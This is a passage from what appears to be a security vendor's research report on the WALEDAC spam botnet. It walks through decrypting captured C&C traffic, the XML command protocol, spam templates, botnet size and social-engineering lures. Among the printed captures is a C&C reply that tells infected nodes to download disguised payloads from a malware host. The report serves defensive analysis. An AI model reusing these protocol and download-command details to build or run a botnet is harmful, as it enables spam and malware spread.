POST/HTTP/1.1 Referer: Mozilla Accept: */* Content-Type: application/x-www-form-urlencoded X-Request-Kind-Code: nodes User-Agent: Mozilla Host: 24.21.164.180 Content-Length: 3904 Cache-Control: no-cache q69d-opDMIUGdOAkQLVWZJImCD-W1o8pV9R30SwOy9nc7U48EkimKhCFPsUzIG67AHBbsHjHa_-kX_8bqO Q7wq2lwEA9I6aRhzs9-mMfgWqb1wHAYU1TEy2iByKUJyxuJ0fg6nV64moWvsM0Jcfy3yrmWkjUUYUy2vfn CF61O4EG27NJ1LYOS5Sp9xeNV8NbL_rnLVkTwiHFcHXcTf6wKfnmGfaVd1ALk7Nnoq1wGIIIgYSNnJsLEPM3sfhKl1mbAj1lAPq-_xGMC6R_t6Sug5WjTVIpa_Eq1aONUADnDCMsm4JYiHYap-odbwMgLs7IZl_5cfQd SRjD0cJjYxNI00H45QEUqOQFeQr3ctx--TC2ob0cmN1nIguJl0KdvATj_bqY8-pnywRZB-hi-7tcrZXyx VGU8DYJ6ewM5m3yxg4sWKmZSCWY1j5HAuxsMafXrsgU7BvN0jQkQUm4K7m9iYmmVYe8uaHBDQ_Pbq5pZUwPguO_CdqTTSWjDgfucmdJ3jhb03xrLuqCqmkE2DEA38NKq_YjEZc0N8MLPOPTKFCA2PMIQX8VH8PtPfMGum2Jl5eAM2GXfovWvX5WvALx1IIeNhlFBhe3UcEKPvcjp3uSWUq-zLeXW9sHp-Rs-CVSmtomEE5ppB78pb IM HTTP/1.1 200 OK Server: Apache 1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 3883 iZg3LlWBrSO8IaRbFB1Gs9EXlzgPaeXLTd8JioLmt27kwXShCdzSpYV7B9DWkqUCtcNHvIn9fmgOIHdp7p9MS8tWoroszO-Mvu6ogASdnpwf1AJE835q06R_KMUMSYPl7kZBeV2CzDv9v9DjYdqNeoCEvlUlrues3w5B iERDXtupIXtTy-Xe4KsSOxywTdv7XRAa8aR9OZUYQNf1OHsAgwRPNehBZSFclqj6aPtFl0mknEIaaZUQq O79UVRCvZU8auQE9jHMNYDYDp_1pBchnzgaxmJPj4cg865j2K1xfzTugVoO6veaEJZ_KiqsETMyNEEjXhr3tnVIxHjjE_Z63S6Rh28zzav_Gplya5Gcpb1kwU179rdphqu8TvUxJB_t0t1QzIvLtG0ahEbHTwb6Cv2XZup0SfUaxeyla8szLMESoHYu94kyj1l6v266NsVlKNFmiruIARL0sxZiFqmoWGDa_WdVUF8bfI39c388Fc52WDJa6h-JWzhgaxKir9iCq2HGddHS4KAbr2sMYdRkLu8yASldb_9mstjXQiMCYOniG0slq4qv7euWsGa BNMKFGTI1DPO9CWKWgnXU3lN1hR-XyJZEPiOPP6l4W4oahePoSvb3IVumNvSgLt5WNbDaY2uQx4NxD xezibQZnAHRbWglzXtv7xQRFacocFuLzIW0tJkFdNLcT2PeD5u85xtbqbcDlVRb7dFPZWrFREynAy1qGD4qXZn1C-wcZhcegcuxv20Vu3hFiyMuh3MSqABS_HPMEkiIdnNNu9NHoKngcy1c3hGEfuCdSk9_XcsHaaoDJ 02uBJ8Iw7BpeKeBULbYpVr82M4DDEh_NK_l0vzYNNZ4hXMDIHR_PGsyoABO1cwwCtzRKen5-O4zr4668v7 hiAnlHMNYJUrz8JuZPLQPFwZQ9FqW9nGWx68XPBRVFglBLnOBa33NEm2m-._-KnaX3hXqqWe-QoWGien7 KGP9kfg4hYhRuZKlNCb6VxWl0es1lilsWtJSvIHrT5G54NZmv94FmOvr_Q1lyd0m8aeCmV_sx43bl_iCKcKo2q4MpqB2DHySb0uRG1eBX5kZjPxOGw6zXWN9auX9r7_RgRyf6izsGFnpoWgVukwcxwrQMgNHMhcx66WT-3X-KVkANkiTJB4KJU2mB7hk1RroV8fmFWQjgaq0FTFbnjLmgg87tZBd_0pid79m-YjWpwmXvadFDo2 FFGAt-23Lu4IcMy8rS4

The message is quite long (truncated on purpose) but is fairly easy to decrypt. The steps described earlier are still applicable, the only difference being after Base64 decoding, all data should be considered, including its first 5 bytes. AES decryption using the first AES key found in the WALEDAC binary is then performed, after which, the data is uncompressed using bzip2.

of 66



The following decoded and decrypted message is the bot or server message reply to the HTTP POST request by the WALEDAC binary from IP 24.21.164.180 as shown above. This message can be an updated list of other WALEDAC nodes:

<lm><localtime>1237547711</localtime> <nodes> <node ip=“98.162.239.96” port=“80” time=“1237547696”> 362789203a76176ddf29db3399273c5f </node> <node ip=“76.123.47.40” port=“80” time=“1237547641”> b542d0288e23574f644eb6064247446b </node> <node ip=“24.249.5.39” port=“80” time=“1237547565”> 3246427e7c67bd0a9d0ac47aec14c818 </node> <nodeip=“76.107.135.225” port=“80” time=“1237547559”> 1f52f117673ff37b7714a16b7422b72d </node> <node time=“1237547233”> 3c36e67efc68eb5a363f0044d4403308 </node> <node ip=“61.120.139.212” port=“80” time=“1237547233”> 8a065c4b616893172a5d0d21df2ca502 </node> <node ip=“67.166.187.226” port=“80” time=“1237547232”> 030a4174a45756002122cc6b94391268 </node> <node ip=“196.203.69.118” port=“80” time=“1237547229”> 590489560c50fa7fc014f03a46644378 </node> </nodes> </lm>

Another form of encrypted message that does not have a 5-byte header is sent by a server or a node when WALEDAC issues an HTTP GET request to /index.php on one of its domains as shown below.

GET/index.php HTTP/1.1 User-Agent: Mozilla Host: greetingguide.com HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Server: nginx/0.6.33 Date: Tue, 03 Feb 2009 21:09:10 GMT Connection: keep-alive X-Powered-By: PHP/5.2.8 496

of 66



4mffm9_Oxo0BRI95ztlYRRNrQHgH7XZAOIYFxeavybQ1SGsfl_7aycAR8eQKeTZq2VlKjcJsTdRUWDgQ0p332JOvdmDSpDCb8-jDXsRO-1mDjMYVKGG6cXoSwhf0QSFl6zp6Bv71969VojF4nCtqTEMN8jeouwV9uJXbxU p07x7WrE7j7OmgjDJM2NgrxQmVvbGWpzeN2BdrK-gyIXGFyGGU8BglPGIfitnnNUJSUeJCZJGzrWtIsho5G jC6Fcenz-7Mt0oItFbp38XvGSnhedyWHt0SZNaxdEhA-M5oWz83ffRm0o6WtVO8OB4vMmuCbK4LwNG_9UFx K8knbLDwLd5g7IZJyi6bA1LqFzwQYXpdVVT2YyeAqNFUoB940ZqV1hJ69zhBcpSwCKhZ8xALPnPmkR6qafqU-quigY74Y6LChlN4_LMMhbY8Xe62hXnaa3uLMkrL2ajiDE7Vj5FcPRpB9Db18NV75p9aew8hhPsivzeABb JZMQOa_2s1eRz_afEeFPmcOKlZ3zEK_aqvtKAbsYcusmnUiYQRyARxXQlq9wj85Wi_N7C1AY4n3b68X7pHbq3MhfHGDUIa8TcExIJvERUABcsj6UE3btrIygimnmO4ylxgqueDzDDRo3fYfMyOCR2pFoSpn-K3nRtIIzcw 30a5friKdyhsBme2g-VKNZQsueE1YC3-y1INUQ7oT4pvvQInV6e9s20YlSPSqMZuFyhG5dYORScTpOxoI24 P6JG--sz-MvPAlqECJVB1MUMqiUdOaFG-LeVOIH5ruuHtVaxovoHz4G2cuSmthOLTyYlmFrkHAE1Fh-xVs NBoYhIHVHcK2DXYITFh-rzxkFJiW7E6N5wc8Ijnzjju1GMO_8f-mwnNkJSLcWpCeIQ-r3V1yfWz8klYv9D sggLDH6K01GPUFZcjt59pwPDecfQz5GZ1D_Y1h2KIp_VP0pTdYnrZz4GZM33Z6_mwBlfQNLNOurkAnZkCYYuFSchympl_WmBMO2UHn7aDGba7-JtYhQ_kbshLz1vsI5lJDiMVbSQkYlT0RPUVYbwPXhDWnab84u-PE9XiQ 9XKjYniWeND2aMRMQUvg9G3hTMhl55vCnLZDWWIhGzqj4qinnYDC8ag1-d58GlrvlxBGLqey9w8El9sFQTI 7S17sHGzPiniNQ

The encrypted server reply can also be decoded and be decrypted by following the steps discussed earlier. Note that after the Base64 decoding, however, the second AES key should be used. The result is the original XML message shown below. bzip2 is no longer used in decompressing this part.

<lm> <localtime>0</localtime> <nodes> <node ip=“211.135.94.231” port=“80” time=“0”> e93c1e64944d64700c35bd3fdd355970 </node> <node ip=“84.16.228.132” port=“80” time=“0”> 33a4c14ed5b99a93d9051e861950c95b </node> <node ip=“217.79.77.251” port=“80” time=“0”> f624d7715e1177628d59d70845024a71 </node> <node ip=“82.74.40.225” port=“80” time=“0”> a423ad3cd308506efc70c25c7e56d228 </node> <node ip=“96.52.249.123” port=“80” time=“0”> 70088958d402a352d05b66687e541b7c </node> <node ip=“89.205.54.201” port=“80” time=“0”> 124b4a0a2b011c5bfc3cf0054566e43e </node> <node ip=“217.218.12.215” port=“80” time=“0”> 116a5d79bd24001f7f62df4a1b5c8260 </node> <node ip=“69.180.11.134” port=“80” time=“0”> a862f13e790ee658015c3943e534163f </node> <node ip=“82.51.36.86” port=“80” time=“0”>

of 66



f15d3d17334caf1c556784743e612e0b </node> <node ip=“82.23.40.215” port=“80” time=“0”> f76ed31e6b184f160d0a451e382cbb17 </node> </nodes> </lm>

DECRYPTING THE ENCRYPTED REGISTRY BLOB

Other encrypted data is found in the registry of the affected host machine, specifically in the RList found inside HKCU\Software\Microsoft\Windows\CurrentVersion as shown below.

Figure 10. Data stored in registry

The binary data is encrypted using either of the two AES keys found in the WALEDAC binary. Decrypting the data using AES yields bzip2-compressed data, a section of which is shown below.

Figure 11. bzip2-compressed data from the registry

of 66



Uncompressing the bzip2 data above reveals XML data containing a list of WALEDAC nodes, which is used to record the most recent known peer nodes below.

Figure 12. Deciphered data from registry

WALEDAC HTTP2P Communication Protocol

WALEDAC uses several commands to control nodes. A node can be designated as a spamming node or a command proxy node. This paper focuses on a WALEDAC-infected machine designated as a spamming node.

As mentioned earlier, WALEDAC’s commands uses the XML message structure to pass information around. The following is the standard structure of a decrypted HTTP POST, the method used by a WALEDAC node to communicate with a WALEDAC proxy, which then relays the communication to the WALEDAC command and control (C&C) using values4:

<lm> <t>(command type)</t> <v>(WALEDAC bot version)</v> (node id) <r>(0 or 1 value)</r> <props> (text) </props> </lm>

The reply from the proxy node slightly differs in structure from a WALEDAC spamming node. The following is the standard structure of a decrypted reply from a WALEDAC C&C:

<lm> <v>(WALEDAC proxy version)</v> <t>(command type)</t> <props> (text)

4 According to NNL-labs (http://www.nnl-labs.com/cblog/index.php?/archives/8-Talking-with-WALEDAC/WALEDAC.html).

of 66



<element>(text)</element> </props> </lm>

Omitted in the reply is the node id while the order of the command type and the WALEDAC bot version is transposed.

There are nine known WALEDAC commands identified by type, namely, ff, 01, 02, 03, 04, 05, 06, 07, and None, each of which is used for a specific purpose. Appendix C shows sample POSTs and replies for each command type.

Command Type: FF (GETKEY)

This command serves as an authentication routine for a WALEDAC node. This is the first command commonly issued by the WALEDAC node when communicating with the WALEDAC C&C before requesting for or before issuing other commands.

In our sample, a WALEDAC node sends a certificate and receives a reply with an AES key. This certificate is the same one found in the WALEDAC binary, which changes from file to file, meaning each WALEDAC node has a unique certificate.

Command Type: 01 (FIRST)

This command contains information on what Windows OS version the WALEDAC node runs on as pointed out by the winver attribute (in our sample, the value is 5.1.2600, which refers to Windows XP).

The C&C gives an empty reply, implying that this particular command is stateless and merely serves to inform the WALEDAC group about the Windows OS version the affected system runs on.

Command Type: 02 (NOTIFY)

For this command, the WALEDAC node just POSTs the date and time when it started running (i.e., time_init), the current date and time (i.e., time_now and time_sys), and how long the affected system has been running (i.e., time_ticks). The text string mirabella_site is hardcoded in the WALEDAC binary as well.

Among all the commands, the replies to Command type 02 from the WALEDAC proxy is the most baffling, mainly because some of its content appear to have no relation to WALEDAC activity.

of 66



The reply contains the text content wergvan, which appears to be a spoofed domain when communicating with a mail server for spamming purposes.

Figure 13. Text content wergvan

The element 203.177.193.xxx in the reply is the external IP of the infected node while the text for the dns_ip and smpt_ip attributes remain unknown since the IP addresses they supply are not consistently seen in network traffic.

http_cache_timeout seems to be a configuration that indicates how long a transaction with a WALEDAC proxy remains valid (in this case, 60 minutes) while the sender_threads and sender_queue seem to be configurations of how many threads and email messages can be generated at any given time, respectively.

The short_logs attribute always has a TRUE text value.

The commands attribute is the most interesting in Command type 02. The text content [CDATA[337|update|http://usabreakingnews.com/mir.jpg340|download|http://usabreakingnews.com/win.jpg] appears to be an instruction to download the files mir.jpg and win.jpg.

Most of the time, these files are plain Joint Pictures Experts Group (.JPEG) files. However, a few instances where WALEDAC updated the spamming node through an embedded and encrypted WALEDAC binary inside the .JPEG files were also seen.

Figure 14. Encrypted WALEDAC binary

embedded inside mir.jpg

Figure 15. Manual decryption reveals the

MZ/PE header

The WALEDAC Botnet



In the three months of WALEDAC monitoring, the spammer node downloaded 11 malware using this method, five of which were updated WALEDAC binaries while the remaining six were rogue antivirus malware.

This technique gives WALEDAC a complicated self-updating method and helps explain the highly homogeneous node variants comprising the WALEDAC botnet.

The images shown below are downloaded from the links found in Command type 02 and were used to carry the WALEDAC binaries. These pictures may have been chosen to humor either the players behind WALEDAC or the security researchers snooping on the botnet’s activities.

Figure 16. Sample images downloaded from links found in Command type 02

Command Type: 03 (TASKREQ)

For Command type 03, the WALEDAC spamming node just sends a short POST message to the WALEDAC proxy node. It appears to be a request by the WALEDAC spamming node for tasks coming from the WALEDAC proxy. A lengthy reply in the following format is then received:

<lm> <v>(proxy node version)</v> <t>taskreq</t> <props></props> <tasks>

of 66



<task id=“(id)”> <body>(b64 encoded string)</body> <a>(target e-mail address)</a> <a>(target e-mail address)</a> … … <w>(name of list - to be used in spam e-mails)</w> … … </task> </tasks> <words> <w name=“(name of list)” time=“(time)”/> … … </words> </lm>

1. Proxy node version: Our sample reply reveals a WALEDAC version 27 proxy, which is a lower version compared with that of the WALEDAC version 34 spamming node. All Command type 03 replies are in version 27, suggesting that the proxy nodes used in the command are probably not being updated.

2. Tasks: Furthermore, the <tasks> element has two child elements, namely, <task id=“4”> and <task id=“3”>. These contain additional child elements that can be used for a particular spam run.

Since the tasks are defined by the group behind WALEDAC, Command type 03 gives WALEDAC controllers the ability to control spam runs—when to begin, what to spam, who to send spam to, what the email body and subject should contain, and what domains and URLs to include.

3. Body: The <body>(b64 encoded string)</body> element contains the email body format of the spam run. Decoding the Base64-encoded string reveals the following:

» For task id=“4”

%^J%^Fpharma^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fpharma_links ^%/^%

The WALEDAC Botnet



» For task id=“3”

%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%.%^Fcupo_ link^%/%^Fcupo_file^%.php^%

Translating the sample to become more readable, the email body for pharma spam comes in the following form:

<phrase advertising pharma> http://<random 2 to 6 letters>.<pharma domain>

Cupo spam (taken from the word coupon) is a WALEDAC spam run advertising fake coupons, which follows the email body format below.

<phrase advertising coupon> http://<random 2-6 letters>.<coupon domain>/<file>.php

4. Target email addresses: After defining the email body format, the next elements contain the target email addresses enclosed in <a></a> tags. Each task contains exactly 500 target email addresses.

5. Name of list: The next elements contain words that are on a list of words that is used to construct the email body and email details.

These words are passed on as parameters when requesting for a new list, a dictionary, or a string array using Command type 04.

Command Type: 04 (WORDS)

Command type 04 updates WALEDAC’s words or word lists that are used in a particular spam run.

To explain how Command type 04 works, we used the Command type 03 sample reply, specifically for task id=“4”.

The Base64-decoded email body format looks like the one below.

%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%.%^Fcupo_ link^%/%^Fcupo_file^%.php^%

The WALEDAC Botnet



The words used include the following:

<w>charset</w> <w>cupo_file</w> <w>cupo_link</w> <w>cupo_string</w> <w>domains</w> <w>mynames</w> <w>names</w> <w>outver</w> <w>outver.5</w> <w>outver.6</w> <w>pharma</w> <w>pharma_links</w> <w>sendmailver</w> <w>surnames</w> <w>svcver</w> <w>trunver</w>

In the example above, the spammer needs to get the word lists for the cupo_string, the cupo_link, and the cupo_file since they are not included in the task child elements.

Command type 04 provides WALEDAC spamming nodes the ability to request for and to update word lists. It also provides WALEDAC’s handler the ability to update words, phrases, and values to create virtually unique and dynamic emails.

The following is a sample spam advertising free coupons that lead to WALEDAC binaries. WALEDAC randomly chooses which entry from each word list to use. Note the words in the sample coupon spam labeled with the word list from which each they were taken:

Figure 17. Sample WALEDAC-related spam

of 66



WALEDAC spoofs the email From field by supplying a fake name from mynames and by constructing a fake email address by concatenating an entry from name and domain word lists (i.e., <name from names>@<domain from domains>).

In the image below, the values chosen from mynames, names, and domains word lists that serve as spoofed From values are labeled accordingly.

Figure 18. Labeled values from mynames, names, and domains word lists

In the preceding image, WALEDAC emulates a Microsoft Outlook mail user agent. WALEDAC supplies a value for the character set X-Mailer and MimeOLE from the charset and outver word lists.

WALEDAC also changes other parts of the Simple Mail Transfer Protocol (SMTP) header, probably in an attempt to confuse spam filters or mail server restrictions.

of 66



Figure 19. Sample message

Figure 20. Sample message


This command reports to WALEDAC proxies the email addresses to which it has successfully sent spam.

of 66



The element attribute b64 whose value is TRUE means the succeeding attributes under reports are Based64 encoded. Based64 decoding attributes reveals the following:

<rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>OK</rep> <rep id=“4” rcpt=“[email protected]”>OK</rep> … … … <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep>

The email addresses are the target recipients provided by the WALEDAC C&C in Command type 03 (domains blurred due to privacy concerns), the text content OK and ERR signifies whether the spamming node successfully sent spam to the particular address or not.

Command Type: 07

This command type reports to the WALEDAC C&C a list of email addresses found in the affected system. This is done by searching for plain-text email addresses in files. This command not only gives the group behind WALEDAC the ability to gather new email addresses to spam but also to filter certain email addresses or certain domains that they want to blacklist to prevent them from receiving the WALEDAC spam.

The C&C reply to this particular message seems to be just an acknowledgment that the message was indeed received.

Command Type: NONE

This is not actually a command type since it does not have a command type number or a command name in the communication. This is basically WALEDAC’s method of sharing and updating available nodes to contact. In the sample POST in Appendix C under None, we can see the IP address, port, time, and node ID in the node attributes. Note that both the POST and the reply follow the same message format.

WALEDAC Command Distribution

Of course, not all commands are equal in terms of distribution. The figure on the next page shows more than two months’ worth of WALEDAC commands broken down by type (i.e., per reply or per POST transaction and not per bytes of data).

of 66



Figure 21. Percentage distribution of WALEDAC commands

Among the command types, Command type none, which shares peer node IP addresses, occupied the biggest chunk. This means that a lot of the WALEDAC traffic is dedicated to ensuring that the nodes the bot connects to are updated.

The second largest chunk, unsurprisingly, belonged to the getkey or the so-called handshake command, which serves as an authentication routine for WALEDAC nodes.

Updating word lists to generate spam took the third biggest chunk, confirming the fact that WALEDAC spamming nodes are designed to be active spammers. It also makes sense that the taskreq command only came after the words command since WALEDAC nodes report successful and unsuccessful spamming attempts.

Both the notify and taskreq commands are intriguing, especially if we consider that spam targets are defined by taskreq replies. So it is quite surprising on our part to see notify transactions having a bigger chunk than taskreq replies. However, a taskreq reply contains at least two spam formats and at least a thousand target email addresses, lessening the need for frequent updates, resulting in a lower number of taskreq transactions compared with other command types. On the other hand, notify transactions are made at least every hour, implying spammers’ firm effort to keep WALEDAC nodes updated.

Unsurprisingly, the smallest number of transactions belonged to the emails command, which reports discovered email addresses to the WALEDAC C&C.

of 66



Figure 22. A plot of spam-related WALEDAC commands

of 66



WALEDAC BOTNET PROFILE

Size of the Botnet

WALEDAC commands are sent through proxy or through repeater nodes, which then relay these to the WALEDAC C&C. On a daily basis, a spamming node sees around 660 unique WALEDAC proxy IP addresses broadcasted through the use of the none command. These are then used by WALEDAC spamming nodes to proxy command transactions and to conduct other WALEDAC-related activities.

Estimating how many have been affected by the WALEDAC botnet is quite a task since it is dynamic in nature—nodes are constantly being added to (i.e., representing new infections) or being removed from (i.e., upon discovery and upon removal of the infection) it. With this in mind, a rough calculation of the size of the population that has been affected by WALEDAC on any given day can instead be done.

To do this, two assumptions should be kept in mind:

1. The number of clients outnumbers that of servers (in the same way that the number of spamming nodes outnumber that of proxy nodes).

2. The current client-to-server ratio is 10:1.

Since an average of 660 WALEDAC proxies operate on any given day and, considering the aforementioned assumptions, it can be gleaned that there are at least 6,600 spamming botnets sending out spam every day. Note that the visibility of the breadth of WALEDAC nodes has been limited to the botnet segment we monitored.

On an average digital subscriber line (DSL) connection with a 0.2Mbps download and a 0.11Mbps upload speed, WALEDAC generates around 140,000 spam per day. So, assuming that 6,600 WALEDAC spamming nodes operate per day, the WALEDAC botnet is capable of spewing at least 924 million spam per day.

WALEDAC Proxies and Fast-Flux Networks

Another interesting discovery we made while investigating WALEDAC is that some proxy nodes and not only proxy WALEDAC commands are also part of the fast-flux system used by WALEDAC-related domains.

of 66



In the image below, the green-colored IP addresses represent proxy nodes while the blue-colored ones represent fast-flux networks. The red-colored IP addresses are used as both WALEDAC proxies and fast-flux networks. Based on our WALEDAC monitoring, around 7 percent of the total number of WALEDAC proxies are also used as parts of fast-flux networks.

Figure 23. WALEDAC proxies and fast-flux networks

Spam and Domain Information

The spam sent by WALEDAC and the domains of the links found therein exhibit characteristics associated with various spam groups, suggesting that it was primarily built as a spamming platform for rent.

From The Spamhaus Project’s top 10 known spammers, at least three groups appear to be renting out WALEDAC-spamming services, including:

» Canadian Pharmacy » Leo Kuvayev/BadCow » Yambo Financials

These groups are responsible for the majority of pharma spam (for Viagra, penis-enlargement, and other related subjects), original equipment manufacturer (OEM), pornographic, and fetishistic spam seen in mailboxes, all of which were seen during our WALEDAC monitoring.

of 66



Aside from the spam categories mentioned above, a mule spam targeting a specific language was also seen. This hints at WALEDAC-spamming services being made available not only to the top spam groups but also to smaller such groups with smaller target populations.

The domains used by WALEDAC to host its website were all registered at Ename Corp. Most of the spam domains advertised by WALEDAC were also registered at Ename. See Figure 14 in Appendix A for a sample of the whois output for a domain used in the bombing news campaign.

Domain Name: TERRORISMFREE.COM Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA ENAME CORP Whois Server: whois.ename.com Referral URL: http://www.ename.com

Rogue Antivirus

Furthermore, using the malware download method in Command type 02, WALEDAC downloads a rogue antivirus malware claiming to be MS Antispyware 2009.

Figure 24. Rogue antivirus installed by WALEDAC called MS Antispyware 2009

of 66



The said rogue antivirus endlessly disrupts users with warnings about malware infections in their systems. It even interrupts users’ Web-browsing activities.

Figure 25. MS Antispyware 2009 alerts the user of spyware and other malware attacks

Figure 26. MS Antispyware 2009 blocking Web browsing

of 66



It even sports a fake Windows Security Center graphical user interface (GUI).

Figure 27. MS Antispyware 2009 fake Windows Security Center GUI

All of these annoyances aim to make the users click the link that leads to a page that sells the full version of MS Antispyware 2009 for US$49.95.

Figure 28. Full version of MS Antispyware 2009 sells for US$49.95

of 66



CONCLUSIONS

» WALEDAC’s primary business model is spamming but it is also used as a platform to introduce other malware to affected systems. WALEDAC is in business with at least three of the top 10 spammers identified by The Spamhaus Project. It is also involved with distributing rogue antivirus, which is currently one of the most prevalent security threats.

» The creators of WALEDAC are knowledgeable individuals, exhibiting a certain degree of comprehending computing concepts such as P2P and distributed computing and the acumen to use technologies such as encryption and XML. These people are not run-of-the-mill programmers or hackers. Most concerning of all:

» They seem to be aware of and intend to capitalize on existing underground business opportunities.

» They are knowledgeable about antivirus, antispam, and Web-blocking technologies. In fact, each of WALEDAC’s most important components (e.g., binaries, spam, and domains) are all programmed to be dynamic in nature in order to evade detection.

» WALEDAC is playing a numbers game, which serves as its strength. It maximizes its ability to update various aspects of its operation, thus posing a volume challenge in terms of the sheer number of affected systems and proxies, spam sent, and spam and malware domains it uses.

» WALEDAC embodies the collective knowledge of the cybercrime community of what works and what does not. It has also been said that “WALEDAC is the new Storm,” which is right in that WALEDAC copied and even improved aspects of Storm that made the latter successful. Its use of HTTP for C&C makes a lot of sense as well since HTTP is much more common than Overnet P2P, thus making it harder to identify and to block the C&C traffic that WALEDAC produces. This proves the cybercriminals’ ability to adapt to changes, making them even more dangerous.

» The people behind WALEDAC are doing their best to remain unknown. Their use of infected proxies and the act of registering domains to registrars linked to spam and malicious domains are meant to obscure their identities.

of 66



APPENDIX A

WALEDAC Social Engineering Tactics

At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware. WALEDAC started out with the Christmas Ecard ploy.

Figure 1. Christmas ecard spam

Figure 2. Christmas ecard website

of 66



As the holiday season progressed into the New Year, so did WALEDAC’s campaign. The spam and their websites continued to use the ecard approach. This time, however, the ecards they sent contained New Year’s greetings.

Figure 3. Sample New Year ecard spam

Figure 4. WALEDAC’s New Year ecard website

of 66



With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”

Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president

Figure 6. WALEDAC rips text off from Obama’s website,

bearing false news that he no longer wants to be the president

After taking advantage of Obama’s presidential campaign, WALEDAC then turned its sights to Valentine’s Day.

of 66



Figure 7. Spam promoting Valentine’s Day ecards

Figure 8. WALEDAC websites capitalizing on Valentine’s Day

of 66



The Valentine’s ecard website later changed with the addition of some text at the bottom of the image, which seemed to target software developers, to promote Valentine Devkit, which was, of course, a WALEDAC malware.

Figure 9. Valentine’s webpage promoting Valentine Devkit

The displayed images on the Valentine-themed websites later changed using a pool of several images with romantic themes. Several of these pictures are shown in Figure 10.

Figure 10. Pictures simultaneously displayed by Valentine-themed WALEDAC sites

of 66



Capitalizing on the current global financial crisis, WALEDAC changed its tactic once more to promote coupons.

Figure 11. WALEDAC spam campaign promoting coupons

Of course, users did not get coupons but malware.

Figure 12. WALEDAC’s coupons website

of 66



Some time later, the coupons website was updated with a GeoIP component, which enabled it to determine the user’s location. This geographic location feature was used to make localized versions of the coupon website, which made its social engineering ploy even more potent.

Figure 13. Using GeoIP, WALEDAC was able to create localized versions of the coupons website

(Note the inclusion of the user’s city name in the webpage.)

The geographic location feature of the localized websites was heavily used in WALEDAC’s next campaign—the terrorist bombing scare.

Figure 14. Spam carrying dire news of terrorist bombings

of 66



The websites were copycats of the Reuters news pages, complete with supposed videos of alleged bombing incidents.

Figure 15. WALEDAC terrorist-bombing website

The fake Reuters webpage used the classic “You need the latest Flash Player” dialog box. Clicking the link leads users not to the Flash Player download page but to one where they can download the WALEDAC malware.

WALEDAC then shifted gears to promote spying on somebody else’s short message service (SMS) messages, notably of one’s partner or lover. The spam was designed to provoke people’s paranoia or fear that their partners may be cheating on them.

of 66



Figure 16. WALEDAC’s email campaign to provoke paranoia

with regard to being cheated on by one’s partner

The URLs in the spam point to websites that advertise free-trial downloads, which are capable of spying on the SMS messages in somebody else’s mobile phone without even installing it.

Unfortunately for those who installed the SMS Spy program, all they got was the WALEDAC bot.

Figure 17. WALEDAC’s SMS Spy website

of 66



APPENDIX B

Spamming Activity

Since we started monitoring WALEDAC, we have observed that it regularly sent out pharma spam.

Figure 1. Sample WALEDAC pharma spam

We noted five supposed pharmaceutical companies advertised by WALEDAC in spam, including:

» Canadian Pharmacy (see Figure 2) » Canadian Health and Care Mall

(see Figure 3) » ED Express (see Figure 4) » Advanced Laboratories Inc. (see

Figure 5) » Pharmacy Express (see Figure 6)

Figure 2. Canadian Pharmacy website

The WALEDAC Botnet



Figure 3. Canadian Health

and Care Mall website

Figure 4. ED Express website (ED stands for

erectile dysfunction)

Figure 5. Advanced Laboratories Inc. website,

which promotes a penis-enlargement patch

Figure 6. Pharmacy Express website

of 66



Besides pharma spam, WALEDAC also sends out spam enticing users with OEM software at discounted rates.

Figure 7. WALEDAC OEM spam

This OEM spam did not promote any website. Instead, it advertised the email addresses of people who sell the so-called “OEM software.” Some of the email addresses we have seen were:

» [email protected] » [email protected]

WALEDAC sometimes also advertises an image-hosting site.

Figure 8. Image-hosting spam

Alternative views suggest that the image-hosting site may have been joe-jobbed.5

5 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090401

of 66



WALEDAC also spammed four distinct mule-recruitment emails. This spam was written in Italian.

Figure 9. Italian mule spam

These Italian mule recruitment emails advertised the following email addresses:

» [email protected] » [email protected] » [email protected] » [email protected]

of 66



WALEDAC also took to spamming the websites of online casino or gambling sites, many of which were Geocities links.

Figure 10. Geocities site advertised in WALEDAC’s online casino spam

The Geocities sites ultimately led to starplayvegas.com.

Figure 11. Final landing site of the casino spam run

of 66



WALEDAC also sent spam advertising two foot-fetish websites, namely:

» ticklefootsies.com » barefootsies.com

Figure 12. Foot-fetish sites advertised by WALEDAC via spam

The WALEDAC Botnet



APPENDIX C

WALEDAC HTTP2P Communication Protocol

There are nine known WALEDAC commands identified by type, namely, ff, 01, 02, 03, 04, 05, 06, 07, and None, each of which is used for a specific purpose.

Command Type: FF (GETKEY)

SAMPLE POST

